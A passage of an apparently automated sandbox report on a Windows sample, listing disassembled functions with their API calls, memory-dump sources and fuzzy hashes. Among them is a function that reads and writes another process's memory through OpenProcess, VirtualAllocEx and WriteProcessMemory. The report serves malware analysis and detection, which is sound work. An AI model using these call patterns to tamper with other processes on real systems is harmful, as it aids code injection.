                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                            Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                            • MessageBeep.USER32(00000000), ref: 00460C46
                                                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                            • EndDialog.USER32(?,00000001), ref: 00460C83
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                            Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                            • String ID:
                                                            • API String ID: 4023252218-0
                                                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                            Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                            • String ID:
                                                            • API String ID: 1489400265-0
                                                            • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                            Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                            • DestroyWindow.USER32(?), ref: 00455728
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                            • String ID:
                                                            • API String ID: 1042038666-0
                                                            • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                            • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                            • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                            • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                            Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                            • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                            • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                            • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                            Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041780F
                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                            • __getptd.LIBCMT ref: 00417826
                                                            • __amsg_exit.LIBCMT ref: 00417834
                                                            • __lock.LIBCMT ref: 00417844
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                            • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                            • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                            • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                            Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                            • String ID:
                                                            • API String ID: 2403457894-0
                                                            • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                            • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                            • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                            • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                            Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                            • __freefls@4.LIBCMT ref: 00415209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                            • String ID:
                                                            • API String ID: 4247068974-0
                                                            • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                            • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                            • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                            • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                            Function 004624C5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 409COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5$8$^
                                                            • API String ID: 0-3622883839
                                                            • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                            • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                            • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                            • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                            Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )$U$\
                                                            • API String ID: 0-3705770531
                                                            • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                            • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                            • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                            • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                            Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 0046E505
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                            • CoUninitialize.OLE32 ref: 0046E53D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                            • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                            • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                            • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                            Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 708495834-557222456
                                                            • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                            • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                            • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                            • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                            Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                            • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                            • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                            • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                            Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
